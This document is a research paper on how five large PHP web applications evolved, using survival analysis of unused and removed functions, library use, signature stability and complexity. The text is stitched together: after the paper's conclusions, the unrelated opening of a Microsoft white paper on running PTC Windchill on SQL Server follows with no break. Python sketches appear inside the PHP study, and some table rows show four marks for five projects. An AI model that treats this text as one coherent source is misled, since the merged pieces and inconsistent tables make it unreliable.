In the first part of this study we focus on unused functions and class methods, i.e. functions which are not invoked by other system functions or methods (i.e. FanIn = 0). We have deliberately avoided using the term 'dead code' as this usually includes non-reachable code blocks, whereas our analysis focuses only on functions which are not invoked. PHP is a highly dynamic language and functions might be called in various ways that static analysis as performed by currently available tools cannot identify. These cases include:

- calls employing the Reflection API
- call_user_func() and call_user_func_array() calls
- method invocations using the new operator with variable class names
- variable function names for static method calls, such as $class::method()
- variable function or method names, such as $function() or $object->$method()
- automatic calls to methods such as __toString() or Iterator::*()

For the cases where the function name is not a literal, it may even be retrieved from database data.

2 http://wordpress.org/ 3 https://drupal.org/ 4 https://www.phpbb.com/ 5 http://www.mantisbt.org/ 6 http://www.phpmyadmin.net/
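To see why such dynamically named calls defeat static analysis, consider this small sketch (in Python rather than PHP; the function and variable names are invented for illustration): the callee is selected by a string assembled at run time, so no call site textually mentions it.

```python
# Analogue of a dynamically named call: the callee is chosen by a runtime
# string (here hard-coded, but it could equally come from a URL or a
# database row), so a static scan of call sites never sees the invocation.
def export_report():
    return "report"

action = "export" + "_report"   # name assembled at run time
result = globals()[action]()    # cf. PHP's $function() / call_user_func()
```

A static unused-code detector that only looks for literal call sites would flag `export_report` as unused, even though it is executed.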
Functions can also be invoked by extracting their name from the URL that users enter in their web browser. Especially in applications that employ the single-front-controller paradigm, where one controller acts as the unique entry point for the entire application, a large number of controller actions might seem to be unused code. Thus, the identification of unused code poses significant challenges and can hardly be accurate. We refer to this type of calls as stealth calls; since they cannot be detected by static analysis tools, they are inevitably considered as unused code, posing a threat to the analysis. Another complication related to the aforementioned limitations is the widely used practice of hooks. Hooks are a functional implementation of the observer pattern that provides an extension mechanism for functions. The simplest implementation of a hook (Figure 1) is to have a global array holding the registered hooks, a function to make hook registrations (e.g. add_action) and finally a function to call the corresponding function handlers for a given hook (e.g. do_action). Thus, for a function that we want to extend, a call to do_action can be made, with a key for the desired hook (e.g. 'my_hook') as parameter. That last call is made using PHP's call_user_func() function, whose first argument is a string containing the desired function name. The use of hooks is clearly not traceable with general-purpose static analysis tools. Many projects employ hooks not only as an extension point for third parties, but also to implement core functionality. For example, a significant portion of the core functionality in WordPress takes advantage of the hooking system. Additionally, plug-ins implemented for the examined systems systematically take advantage of the hooking mechanism. The ideal solution to determine all actual function invocations is to examine the code manually, a process that is however infeasible even for medium-sized applications.
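The hook mechanism described above can be sketched in a few lines (shown in Python for brevity; the names add_action/do_action mirror the PHP originals):

```python
# Minimal sketch of a hook registry: a global map from hook name to the
# list of registered handler callables (the observer pattern).
hooks = {}

def add_action(name, handler):
    """Register a handler under the given hook name."""
    hooks.setdefault(name, []).append(handler)

def do_action(name, *args):
    """Invoke every handler registered for the hook, in order."""
    # cf. PHP's call_user_func(): each handler is reached only via the registry
    for handler in hooks.get(name, []):
        handler(*args)

log = []
add_action("my_hook", lambda msg: log.append(msg))
do_action("my_hook", "post saved")   # log becomes ["post saved"]
```

Because every handler is reached only through the registry, a static call-graph analysis sees no caller for it, which is exactly why hooked functions are misclassified as unused.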
In our study we have used Bergmann's phpDCD12 tool to analyze the source code and extract unused code. To the best of our knowledge, phpDCD is one of the most reliable dead/unused-code detectors for PHP employing static analysis. However, the limitations that have been discussed remain valid.

12 https://github.com/sebastianbergmann/phpdcd

Figure 1: Simplest implementation of hooks

B. Survival Analysis

Survival analysis models the time it takes for events to occur and focuses on the distribution of the survival times. It has been applied in many fields, ranging from the estimation of time between failures of mechanical components and the lifetime of light bulbs to the duration of unemployment in economics and the time until infection in the health sciences. In each context of application it is necessary to provide an unambiguous definition of the termination event. Survival can be modeled by employing an appropriate survival function. Non-parametric survival analysis does not assume any underlying distribution for survival times. The most common non-parametric analysis is Kaplan-Meier [6], where the survival function, illustrated graphically by the corresponding Kaplan-Meier curve, refers to the probability of an arbitrary subject in a population surviving $t$ units of time from the time it has been introduced. Classical Kaplan-Meier analysis treats all subjects as if they existed at the beginning of the study and therefore does not allow the mapping of drops in the survival probability to particular time points (releases in our case).
To enable a more detailed analysis of software evolution we also employ charts illustrating the survival function (rather than the cumulative probability to survive from time zero to $t$) as follows. Restricting observation to the discrete time points $t_1, t_2, \ldots, t_n$ at which termination events occur, we define $r_1, \ldots, r_n$ to be the numbers of subjects at risk and $d_1, d_2, \ldots, d_n$ to be the numbers of events at these time points. The probability of surviving the interval ending at $t_1$ is estimated by $S(t_1) = 1 - d_1/r_1$, where $d_1/r_1$ is the estimated proportion of subjects undergoing the termination event in that interval. The probability of surviving from $t_1$ to $t_2$ is given by $S(t_2) = 1 - d_2/r_2$. Thus, the survival function is equal to unity minus the hazard ratio $d_i/r_i$:

$$S(t_i) = 1 - \frac{d_i}{r_i}$$

In contrast to most studies that employ survival analysis, where the initial population is not enhanced by new entries, in our case we follow the approach of Pollock et al. [13] and Scaniello [16]. In particular, new code blocks added in each version are treated as 'staggered' entries [13] and are added to the existing population of functions which are "at risk".

C. Survival regarding function usage

To apply the aforementioned survival analysis to the usage of functions, the termination event refers to the time point at which a function "becomes unused". A function or method (for the sake of simplicity we will refer to both as functions) becomes unused when there are no observable calls to that function. The assumption that has been used, similarly to Scaniello [16], is that once a function becomes unused in a version, it remains unused to the end of the observation. In order to calculate the survival function the following mapping is proposed: the discrete time points of observation \( t_i \) are the consecutive versions of the project under study.
In each version, the functions and methods existing in that version are said to be at risk, and their number is denoted as $r_i$, excluding those that were marked as terminated in previous versions. Finally, $d_i$ indicates the number of functions and methods that become unused at version $i$. Drupal and PhpMyAdmin contain a significant amount of unit tests, indicating the effort that is made towards quality assurance; however, unit test functions are not invoked by the application itself and should not be counted as used code. For this reason, unit tests are excluded from the survival analysis. Moreover, we make the assumption that all functions and methods can be characterized by the same survival function regardless of the time they were added to the project. In other words we assume that all functions can be characterized by the same probability of becoming unused.

D. Survival regarding function removal

In subsection III.C we presented our approach for analyzing the survival of functions and methods considering as termination event the time point at which they become unused. In this subsection we focus the survival analysis on the removal of functions. In other words, we consider as termination event the time point at which a function is removed from the system. The reason for performing the analysis at the function level (i.e. excluding class methods) is that the systems under study are mainly functional and their public API is mostly functional.
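The bookkeeping of $r_i$ and $d_i$ for the "becomes unused" termination event, including the assumption that a terminated function stays excluded even if calls reappear, could look like the following. This is an illustrative sketch; the per-version snapshot representation (function name mapped to its set of callers) is an assumption, not the study's actual data model:

```python
def usage_survival_counts(snapshots):
    """Track the 'becomes unused' termination event across versions.

    snapshots: one dict per version, mapping function name -> set of callers.
    A function terminates when its caller set becomes empty; once terminated
    it is excluded from the risk sets of all later versions.
    Returns a list of (r_i, d_i) pairs, one per version.
    """
    terminated = set()
    counts = []
    for snapshot in snapshots:
        at_risk = [name for name in snapshot if name not in terminated]
        unused = [name for name in at_risk if not snapshot[name]]
        terminated.update(unused)
        counts.append((len(at_risk), len(unused)))
    return counts
```

Note that a function such as `c` below, which regains a caller in the second version, is still excluded there, mirroring the stated assumption.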
Moreover, since PHP does not provide visibility modifiers for functions, the identification of the public API is not possible through source code analysis. Developers should consult the documentation in order to retrieve the subset of functions belonging to the public API. However, updates to the documentation are not performed systematically and as a result API documentation matching the official releases is not always reliable. Survival analysis regarding function removal enables us to obtain an insight into the evolution of the public API, given that functions are by definition public. The mapping for estimating the survival function with respect to the removal of functions is similar. The discrete time points of observation $t_i$ are the consecutive versions of the project under study. At each version, $r_i$ represents the number of functions being at risk, including the functions that survived from the previous version and the newly introduced ones. The termination event is defined as the removal of a function, meaning that the function signature is not defined in the project any more. Thus, $d_i$ refers to the number of functions that are removed at version $i$.

E. Data collection and presentation software

A software tool has been developed to automate the analysis. The tool has been implemented in PHP on top of the Symfony framework. It has a web interface in order to add projects for analysis and enable viewing of the results. The backend of the tool runs several steps in order to collect and analyze the projects. Initially it downloads from GitHub all versions of the project's source code and runs pDepend to retrieve basic file information and elementary metrics. Then, it runs the phpDCD tool and imports its results to collect unused code data. Source code parsing and abstract syntax tree analysis follows to obtain function and method signatures. The aforementioned data are stored in a database for each version of the project.
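For the removal analysis, counting $r_i$ and $d_i$ amounts to set differences over the signatures defined in consecutive versions. A minimal sketch, assuming signatures have already been extracted as plain strings (the extraction itself is done by the study's tool, not shown here):

```python
def removal_survival_counts(versions):
    """Track function removal as the termination event.

    versions: one set of function signatures per release.
    d_i counts the signatures defined in release i-1 that are no longer
    defined in release i; r_i is the population at risk, i.e. survivors,
    removals, and the staggered new entries of release i.
    Returns a list of (r_i, d_i) pairs, one per release.
    """
    counts = []
    previous = set()
    for current in versions:
        removed = previous - current   # termination events d_i
        at_risk = previous | current   # survivors + removed + new entries
        counts.append((len(at_risk), len(removed)))
        previous = current
    return counts
```

For two releases {a, b, c} followed by {b, c, d}, this yields (3, 0) for the first release and (4, 1) for the second: `a` is the removal event, `d` the staggered entry.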
Using the stored data, the various analyses discussed in this study are performed. Results are accessible from the "public" section of the tool's web interface.

IV. RESULTS AND DISCUSSION

A. Survival regarding function usage

Kaplan-Meier curves illustrating the percentage of system functions surviving over successive software versions are shown in Figure 2 for all examined projects (the horizontal axis corresponds to the number of versions).

Figure 2 Kaplan-Meier survival plots regarding function usage

As it can be observed, for Drupal and MantisBt, the vast majority of functions tend to remain used. For example, in MantisBt, after 25 successive versions, almost 99% of the initial number of functions are still invoked by other functions in the project. For the other three systems, a non-negligible percentage of functions is gradually becoming unused. To provide further insight into the usage of functions and allow a mapping to the corresponding releases, we plot the survival function $S(t)$ for each examined project in Figure 3. The horizontal axis represents the consecutive versions and the vertical axis the value of the survival function. The results for each project are examined separately along with a discussion of the major findings. In contrast to the previous Kaplan-Meier curves, in these plots containing staggered entries, we can also observe the impact of functions being introduced in one version and not being used thereafter. Moreover, library code is included in the analysis to investigate its effect. The plots for phpBB and Drupal share the same characteristics, since their survival function remains constant for a long time period and then exhibits a significant drop at a particular point of their evolution. For phpBB there is a large drop in version 3.0.0 and for Drupal in version 7.0.

---
13 http://phpunit.de/
14 http://symfony.com
15 http://pdepend.org/
16 http://snf-451681.vm.okeanos.grnet.gr/
---
According to manual examination of their source code and their documentation, both projects underwent major changes in the corresponding versions. Both projects extensively employed the notion of hooks, not only as an extension mechanism, but also for the implementation of the core functionality. Additionally, in these versions object-orientation literally invaded those projects. In the other three projects, source code examination showed that the versions where the survival function drops coincide with the employment of vendor libraries. For example, MantisBt uses the ADOdb\(^{17}\) library, a widely used database layer, and in both cases (versions 1.1.0 and 1.2.0) there was an update of that library. Also in 1.1.0 the development team introduced a SOAP API to the application. For this reason the developers added the nuSoap\(^{18}\) library, a very widely used library implementing SOAP server and client protocols. In version 1.2.0 they also added the ezc\(^{19}\) library, a library of general purpose components. In WordPress, according to the change log and the blog entries announcing version 2.7, enhancements were so important that it could have been tagged as a major release, namely 3.0. Despite these major changes the drop in the value of the survival function in version 2.7 is rather small. In the next major version, 2.8, the drop of the survival function is larger; however, according to the announcement blog entry the enhancements were less important. The question that arises is why less important changes caused a larger change in the survival function. A closer look at the unused functions in version 2.8 provides further insight. The authors added the SimplePie\(^{20}\) library for RSS feed consumption. This building block alone contributed more than 50% of that version's unused code. Despite the major enhancements in version 2.7, no building blocks were added.
This supports our conclusion that in web applications the key contributor to unused code is the incorporated building blocks and that developers pay attention to keeping their own code clean from unused code. In scripting languages like PHP, using a third party library, implemented also in PHP, means that the library's code has to be added to the application's code. There is no binding of binaries as in the case of .jar files in Java. Unavoidably, using a proportion of the library's functionality leads the rest of the library code to remain unused. Along with phpBB and Drupal, WordPress also employs hooks as an extension mechanism to the public API, and additionally uses them to implement core functionality. Its API is also constantly growing due to the addition of stealth calls, resulting in regular drops in the survival function. To summarize, four of the projects introduced code appearing as unused due to the implementation of hooks, and three out of five introduced a high percentage of unused code due to the incorporation of third party libraries. Another point of interest is related to the versions where drops in the survival function appear. In general, drops in the survival function coincide with the project's major versions. For example, in phpMyAdmin, all eleven drops of the survival curve coincide with the project's major versions. This reveals the maintenance strategy that has been used: new code, and thus new features, is added in major versions, while in minor versions only bug fixing is performed. To illustrate this form of evolution, we tracked function additions in the sample. In Figure 3 we show the additions of functions/methods made in each version as a percentage of the number of total functions/methods that were employed in the previous version. A stalactite-stalagmite phenomenon is evident: new code is added in major versions, while minor versions contribute almost no additions.
Finally, we calculated the survival separately for functions and class methods for MantisBt, PhpMyAdmin and WordPress. Methods exhibit higher drops (implying that functions have a higher survival probability than methods), conforming to findings comparing C and C++ [18]. From the aforementioned observations it can be concluded that in the examined large-scale PHP projects a rather “rich” form of continuous maintenance is taking place, involving the incorporation of external libraries and the addition of new code that takes advantage of the new libraries. If scripting languages were not suitable for evolving software, these kinds of changes would be scarce and would degrade over time, which is not the case in the examined systems.

B. Survival regarding function removal

The focus of the analysis now changes, as the terminating event is the removal of a function (rather than the ending of its usage). Kaplan-Meier survival plots are shown in Figure 4. In three out of the five projects a major drop can be observed at a particular point in their history, implying the removal of a large percentage of their functions. For Drupal and Wordpress the drops are rather regular and less abrupt.

Figure 4 Kaplan-Meier survival plots regarding function removal

As in the previous section, to obtain a better insight into the corresponding phenomena, we show in Figure 5 plots of survival functions for all projects, including library code, as well as the percentage of added methods over the total number of functions of each project. The results will be discussed according to the pattern of the survival curve in relation to the method additions. MantisBt and phpBB exhibit the same pattern.

---
17 http://adodb.sourceforge.net/
18 http://nusoap.sourceforge.net/
19 http://ezcomponents.org/
20 http://simplepie.org/
---
There is one hotspot, where the survival function drops and a significant population of methods is added. The hotspot for MantisBt is version 1.2.0, and for phpBB version 3.0.0. After a manual inspection of the changes we found that approximately 62% and 45%, respectively, of the removed functions were replaced with class methods with the same functionality. For example, in MantisBt the developers moved the wiki integration, the upgrade module and the graphs module to object-oriented implementations, the enumeration functions to the ENUM class, and part of the bug_api to the BugData class. In phpBB they moved the bbcode parser, session handling and search functions into classes. The remaining removals are due to functionality modifications and architectural changes. For example, in phpBB, the database upgrade module was entirely rewritten, resulting in the removal of numerous functions.

Figure 5. Survival functions regarding function removal and method additions. Left vertical axis represents the value of the survival function, right vertical axis represents the percentage of method additions and horizontal axis the consecutive versions.

PhpMyAdmin, WordPress and Drupal do not exhibit a single hotspot but function removals are distributed over almost all major releases. Concentrated additions of class methods in major releases occurred only in PhpMyAdmin and Wordpress. As already mentioned, Drupal adopted object orientation in version 7.0 and since that version only a limited number of classes have been added, while no functions have been removed thereafter. So in Drupal, internal functionality improvements via function rewrites are the source of function removals in all versions but version 7.0. In that version, the database layer was completely replaced by a new object oriented database layer, substituting 70 functions with over 450 class methods.
Despite the continuous additions of class methods in Wordpress, after manual inspection we found that in version 2.8 there was a migration to object orientation, where the majority of the removed functions were replaced with class methods that have the same functionality. As in Drupal, in the rest of the cases where function removal is high, the reason is the rewriting of the same functionality employing the procedural paradigm. In phpMyAdmin there are two versions with a larger change in the survival function, versions 4.0.0 and 4.1.0, indicating that major changes took place. A manual review of the source code confirmed our speculation. In version 4.0.0, 267 functions were removed, of which 76% were moved to classes. For example, the transformations module, auth module and export module were rewritten as object oriented plug-ins. A set of utility functions (common.lib.php) was packed into a class (Util.class.php) and similarly a set of functions used to display query results was packed into a class (DisplayResults.class.php). In version 4.1.0 rewriting in the same manner took place. Functions in the same context were packed into classes; for example, validation functions were moved to a Validator class and database interface functions were moved to the DatabaseInterface class. Finally, a large set of functions implementing the dbi (DataBaseInterface) library have been refactored to classes. Cumulatively, 77% of the removed functions migrated to classes. An observation made during the inspection of the source code is that a number of functions reported as removed were actually renamed due to a change of coding standards. The initial naming convention for function names was snake case, following PHP's conventions, but the recent trend in PHP, as also proposed in the PSR-1 standard, is camel case, so the developers changed the project's coding standard, applying camel case to function and method names.
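A rename caused by such a coding-standard change can be filtered out heuristically by normalizing snake case names to camel case before counting removals. The sketch below is a hypothetical illustration of that idea, not the procedure used by the authors; a real filter would also compare function bodies:

```python
def to_camel_case(name):
    """Convert a snake_case identifier to camelCase (the PSR-1 style trend)."""
    head, *rest = name.split('_')
    return head + ''.join(part.capitalize() for part in rest)

def probable_renames(removed, added):
    """Pair removed snake_case functions with added camelCase functions
    that normalize to the same name, so they are not miscounted as
    genuine removals. Purely name-based, hence only a heuristic."""
    index = {a.lower(): a for a in added}
    return {old: index[to_camel_case(old).lower()]
            for old in removed
            if to_camel_case(old).lower() in index}
```

Here `get_user_name` removed alongside `getUserName` added would be flagged as a probable rename, while an unrelated removal such as `drop_table` would still count as a termination event.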
To summarize, three of the five projects are gradually migrating their functions to class methods, and thus function removal is justified by this fact. The other two projects, Drupal and Wordpress, are employing object orientation for the implementation of new features and removed functions are replaced with new function implementations. One possible interpretation is the plethora of user contributed plug-ins and themes for Drupal and Wordpress, as a result of which breaking compatibility is not an option. At the time of writing, Wordpress' download site contained almost 30,000 plug-ins and more than 2,000 themes. For Drupal, there are more than 8,000 modules and almost 600 themes. Most of them are user contributed and distributed under an open source license.

C. Library usage

PHP is a rather new programming language and according to TIOBE has gained popularity during the last decade. An indirect indication of maturity for a given programming language is the development of third party libraries and their employment in other projects. In three out of the five projects in our study we have observed a strong trend towards using such libraries. As Tulach [19] observes, the trend in modern software development is the use of such pre-made building blocks in order to ease and speed up the development of applications. As we have shown, a side effect is the introduction of unused code blocks, due to the scripting nature of the language. However, the fact that the library's source code becomes part of the system's source code enables us to measure the ratio of library code over system code, something that is not straightforward with compiled languages. In Figure 6 the plots show the used library code over the system code of each application (please note that the y-axis range is not the same across all projects). PhpBB and Drupal appear to employ a limited portion of third party libraries.
D. Interface stability

The stability of an interface can be characterized by the number and types of changes to the functions' signatures. According to the strict PHP definition, a function signature is only the name of the function, but this does not reflect interface compatibility, since no parameters are included. To track interface changes in more detail, we have also considered the mandatory and optional function parameters as well as the default values of the optional parameters. We classified the possible changes into six categories, as shown in Table III. For each version of the examined systems we have computed the ratio of changes over the total number of signatures, differentiating between the six cases shown in Table III. Next, we computed the mean over all versions for each project and the results are summarized in Table IV. The values for cases C1 to C5 are extremely low, considering the almost ten years of evolution for each project. This fact implies that the development teams have paid attention in order not to break backward compatibility and that the corresponding APIs are mature. Changes of the 6th type exhibit a mean ranging from 3.75% for phpMyAdmin to 14.22% for phpBB, providing further support to the aforementioned claim, since despite the implementation changes for a number of functions, the corresponding signatures remained stable.

---
22 http://www.php-fig.org/psr/psr-1/
23 http://en.wikipedia.org/wiki/CamelCase
24 http://www.tiobe.com/index.php/content/paperinfo/tpci/PHP.html
25 https://phpexcel.codeplex.com/
---
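The six categories could in principle be detected mechanically by diffing signature models between versions. The following sketch uses an assumed, simplified signature representation; the paper does not describe its implementation at this level of detail, so both the `Sig` model and `classify_change` are illustrative:

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Sig:
    """Assumed, simplified model of a PHP function signature."""
    mandatory: tuple        # mandatory parameter names, in order
    optional: tuple         # (name, default_value) pairs, in order
    return_type: str = ""   # taken from a @return annotation, if present
    body_hash: str = ""     # digest of the implementation

def classify_change(old, new):
    """Map a change between two versions of a signature to categories C1-C6."""
    found = []
    if old.mandatory != new.mandatory:
        found.append("C1")                      # mandatory parameters changed
    old_opt, new_opt = dict(old.optional), dict(new.optional)
    if set(new_opt) - set(old_opt):
        found.append("C2")                      # optional parameter added
    if set(old_opt) - set(new_opt):
        found.append("C3")                      # optional parameter removed
    if any(old_opt[p] != new_opt[p] for p in set(old_opt) & set(new_opt)):
        found.append("C4")                      # default value changed
    if old.return_type != new.return_type:
        found.append("C5")                      # annotated return type changed
    if not found and old.body_hash != new.body_hash:
        found.append("C6")                      # implementation-only change
    return found
```

C6 is deliberately reported only when the signature itself is untouched, matching its definition as a change with no impact on interface compatibility.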
**TABLE III. CATEGORIES OF CHANGES TO FUNCTION SIGNATURES**

<table>
<thead>
<tr>
<th>Category</th>
<th>Change</th>
<th>Impact</th>
</tr>
</thead>
<tbody>
<tr>
<td>C1</td>
<td>Change of mandatory parameters</td>
<td>Breaking function's compatibility, i.e. client has to refactor function invocation</td>
</tr>
<tr>
<td>C2</td>
<td>Addition of optional parameters</td>
<td>Possible extension of function's functionality or enhanced detail in their results. No impact on compatibility, i.e. existing clients do not have to be adapted</td>
</tr>
<tr>
<td>C3</td>
<td>Removal of optional parameters</td>
<td>Possible breaking of function's compatibility; issues to calls that used the removed optional parameters</td>
</tr>
<tr>
<td>C4</td>
<td>Change of default values</td>
<td>Possible breaking of function's compatibility; issues to calls that used the default values</td>
</tr>
<tr>
<td>C5</td>
<td>Change of function's return type (identified by PHP annotations)</td>
<td>Possible breaking of function's compatibility; issues to calls that expect a different return type</td>
</tr>
<tr>
<td>C6</td>
<td>Change of function's implementation</td>
<td>No impact on interface compatibility but a factor that shows interface stability, since developers pay attention when evolving a function to keep its interface intact</td>
</tr>
</tbody>
</table>

**TABLE IV.
RATIO OF CHANGES IN FUNCTION SIGNATURES**

<table>
<thead>
<tr>
<th>Project</th>
<th>C1 (%)</th>
<th>C2 (%)</th>
<th>C3 (%)</th>
<th>C4 (%)</th>
<th>C5 (%)</th>
<th>C6 (%)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Drupal</td>
<td>0.15</td>
<td>0.08</td>
<td>0.03</td>
<td>0.09</td>
<td>0.16</td>
<td>6.02</td>
</tr>
<tr>
<td>WordPress</td>
<td>0.06</td>
<td>0.16</td>
<td>0.03</td>
<td>0.27</td>
<td>0.42</td>
<td>8.70</td>
</tr>
<tr>
<td>phpBB</td>
<td>0.14</td>
<td>0.35</td>
<td>0.02</td>
<td>3.19</td>
<td>0.97</td>
<td>14.22</td>
</tr>
<tr>
<td>MantisBt</td>
<td>0.04</td>
<td>0.11</td>
<td>0.00</td>
<td>0.46</td>
<td>0.50</td>
<td>6.65</td>
</tr>
<tr>
<td>phpMyAdmin</td>
<td>0.09</td>
<td>0.09</td>
<td>0.02</td>
<td>0.70</td>
<td>1.26</td>
<td>3.75</td>
</tr>
</tbody>
</table>

**E. Classes invasion**

Object orientation in PHP was fully supported in version 5.3, but it was partially supported and used a few years before that, starting in early 4.x versions. So there was a period during which procedural systems could migrate code to classes. In Figure 7 we present the ratio of the number of methods over the total number of functions and methods for each version of the five projects.

**Figure 7 Methods ratio over total number of functions and methods**

Our conclusion is that migrating applications from the procedural to the object oriented paradigm is not only a matter of the developers' will or the implementation language, but also of whether the project can afford the cost of breaking backward compatibility, imposing significant issues on its clients.

**F. Evolution of Complexity**

To complement our study with a rather traditional measure, we computed McCabe's cyclomatic complexity (CCN), thereby investigating whether PHP practitioners implement comprehensible and thus maintainable code. We calculated CCN per function and then obtained the average CCN of all functions for each version.
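The bucketing behind Figure 8, assigning each function's CCN to one of three ranges (thresholds 5 and 10, as discussed below), can be sketched as follows; the function and its representation are illustrative, not taken from the study's tool:

```python
def complexity_profile(ccn_values, thresholds=(5, 10)):
    """Bucket functions into [0,5), [5,10) and [10, inf) complexity ranges
    and return the percentage of functions falling in each range."""
    low, high = thresholds
    buckets = [0, 0, 0]
    for ccn in ccn_values:
        if ccn < low:
            buckets[0] += 1      # excellent readability
        elif ccn < high:
            buckets[1] += 1      # medium complexity, still readable
        else:
            buckets[2] += 1      # should be examined closely
    total = len(ccn_values) or 1  # avoid division by zero on empty input
    return [100.0 * b / total for b in buckets]
```

Applying this per version and plotting the three percentages over the release history reproduces the kind of chart shown in Figure 8.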
To make the results more readable we categorized the functions according to their CCN into three ranges. A value of 10 is usually considered as a critical threshold [3], [4]. To enable a more fine-grained classification and to comply with critical levels identified by various quality assessment tools, we considered a second threshold at the value of 5. As a result, values in the range [0, 5) imply excellent readability, values in [5, 10) medium complexity but still readable code, and values of 10 or higher code that should be examined closely. Next, we calculated the percentage of functions belonging to each range. The percentages over time are almost constant for all five projects, as shown in Figure 8.

**Figure 8 Evolution of functions in three complexity ranges over time**

The percentage of functions in the high complexity class remains almost the same across all versions and is relatively low, suggesting that new code added to the projects does not contribute to quality degradation. The resulting conclusion regarding this aspect of software quality is that the examined projects are developed properly, leading to maintainable code.

G. Overview of findings

To facilitate the interpretation of the results, an overview of the investigated phenomena, the employed unit of analysis and the conclusions derived based on the findings for each project is provided in Table V. A ‘✔’ mark implies that the derived conclusion can be considered as validated for the corresponding project, while a ‘×’ mark implies that the conclusion is not validated (‘N/A’ is used for the claim that classes introduce more unused code than functions, for the two projects that had a very limited number of classes).

V. Threats to Validity

As already mentioned, one important threat to the construct validity of our study is the presence of stealth calls, i.e. functions/methods which are identified as unused, despite the fact that they are actually invoked. According to Wohlin et al.
[20], construct validity reflects the extent to which the phenomenon under study really represents what is investigated. Although it is not possible to estimate the extent of stealth calls in the examined systems, this threat is partially mitigated since the analysis is evolutionary and thus changes in the observed phenomena and trends are relative, partially factoring out the effect of unidentified function invocations. Another threat of the same type, pertaining to the applied survival analysis, is related to the consideration that once functions become unused they remain unused for the rest of the evolution. Obviously, a function might become unused and then be invoked again in a subsequent version, or might even become unused again later, and so on. This threat is mitigated by the choice to consider the survival function rather than the cumulative survival estimator, which would over-stress the impact of unused functions. Since the analysis is based on results from 5 web applications, threats to external validity are present, limiting the ability to generalize our findings. Moreover, the fact that the examined applications are large, widely known and heavily used implies that the development practices in these projects might differ from other, less professionally developed systems. However, since the goal was to investigate whether development with scripting languages can comply with the proper practices laid out by software engineering, the authors believe that the examined systems are representative of multi-version, multi-person projects in Web applications addressing the needs of a vast community of clients.

VI. Related Work

Software evolution is one of the most studied areas in software engineering, originating in the 1970s when M. Lehman laid down the first principles of software evolution [7], which gradually evolved to eight laws. The validity of Lehman's laws in various contexts has been studied by several researchers.
Recently, Xie et al. [21] studied the software evolution of seven open source projects implemented in C.

**TABLE V. OVERVIEW OF FINDINGS**

<table>
<thead>
<tr>
<th>Phenomenon</th>
<th>Unit of Analysis</th>
<th>Conclusion</th>
<th>Validation on projects</th>
</tr>
</thead>
<tbody>
<tr>
<td>A. Survival regarding function usage</td>
<td>Survival function (term. event fan-in=0)</td>
<td>The main source of unused code is library usage.</td>
<td>✔ ✔ × ✔ ✔</td>
</tr>
<tr>
<td>B. Survival regarding function removal</td>
<td>Survival function (term. event function deletion)</td>
<td>Function removal appears in major versions</td>
<td>✔ ✔ ✔ ✔</td>
</tr>
<tr>
<td>C. Library usage</td>
<td>Percentage of library source code over project's own code</td>
<td>Projects reuse code incorporating third party libraries</td>
<td>✔ ✔ × ✔</td>
</tr>
<tr>
<td>D. Interface stability</td>
<td>Percentage of functions in each change category</td>
<td>Function interface remains stable</td>
<td>✔ ✔ ✔ ✔</td>
</tr>
<tr>
<td>E. Classes invasion</td>
<td>Percentage of class code over total source code</td>
<td>Projects gradually migrate to OO paradigm</td>
<td>✔ ✔ ✔ ✔</td>
</tr>
<tr>
<td>F. Evolution of Complexity</td>
<td>Percentage of modules in each complexity category</td>
<td>Complexity remains stable</td>
<td>✔ ✔ ✔ ✔</td>
</tr>
</tbody>
</table>

Conclusion: The examined PHP applications undergo systematic maintenance.

McCabe's CCN and LOC were used to investigate the validity of the second and the sixth law, respectively. Both laws have been validated. The findings for PHP projects are in agreement with these conclusions for C projects. Survival analysis to estimate aspects of software projects has been employed by Sentas et al. [17] as a tool to predict the duration of software projects. In a similar manner, Samoladas et al. [15] employed the Kaplan-Meier estimator to predict the duration of open source projects.
Scanniello [16] applied the Kaplan-Meier estimator to Java open source projects, to study the effect of dead code on the evolution of projects. The results show that high rates of unused code are detected in most of the projects in that study. Regarding the use of libraries, Heinemann et al. [5] studied the extent of software reuse in Java open source software. The authors made a distinction between black box and white box usage, which does not apply to scripting languages, and in order to quantify the extent of reuse they measured the bytecode size of the jar files used. They showed that in most cases over 50% of the code size has its source in third party libraries. Mockus [11] investigated large-scale code reuse in open source projects by identifying components that are reused among several projects. However, Mockus' work quantifies how often code entities are reused, rather than the actual amount of third party code. Based on their results, code reuse is a common practice in open source projects, a fact which is confirmed by the findings in our study.

VII. CONCLUSIONS

Scripting languages, and PHP in particular, form the cornerstone of an increasing number of widely acknowledged and heavily used web applications. Five such projects have been analyzed in this paper in an attempt to investigate the maintenance habits followed by open-source developers relying on PHP. Several aspects of software evolution have been investigated, including the presence of unused code, the removal of functions, the use of third-party libraries, API stability and complexity, as well as the migration to the object-oriented paradigm. The results are conclusive: the examined PHP projects undergo systematic maintenance driven by targeted design decisions, and PHP does not seem to hinder adaptive and perfective maintenance activities. In particular, projects rely on the use of third-party libraries which in turn introduce unused code. All systems gradually migrate to the object-oriented paradigm.
Migration to object-orientation in three of the five projects is performed by replacing functions with objects, while for two projects only new features are implemented with classes. The interface of functions remains strictly stable avoiding compatibility problems with existing clients. Finally, the complexity of the projects appears to remain stable, in terms of the percentage of system modules in distinct complexity levels. All of these findings suggest that maintenance is performed with care and in a well-organized manner for the examined PHP applications and significant lessons can be learned from their evolution history.
Best Practices for PTC Windchill on Microsoft SQL Server Production-proven content and process management software Microsoft Corporation Published: May 2010 Author: Ken Lassesen Reviewers: Tim Atwood (PTC), Victor Gerdes (PTC), Richard Waymire (Solid Quality Mentors) Abstract PTC Windchill is the only Product Lifecycle Management (PLM) solution designed from the ground up to work in an Internet-based, distributed-design environment. Whether you need core product data-management capabilities, optimization of processes to meet industry-specific requirements, or support for global product development, Windchill has the capabilities you need for effective management of global product development teams. Microsoft® SQL Server® provides an ideal database platform for Windchill. With SQL Server as a foundation, Windchill can further reduce the time and costs related to managing product development. This white paper provides best practices for configuring and running Windchill on the SQL Server database platform. The information in this paper complements the detailed support documentation provided on the PTC support Web site. Implementing these best practices can help you avoid or minimize common problems and optimize the performance of Windchill on SQL Server so that you can effectively manage your resources, reduce operating expenses, increase productivity, and improve employee satisfaction. Copyright Information The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information presented after the date of publication. This white paper is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED, OR STATUTORY, AS TO THE INFORMATION IN THIS DOCUMENT. 
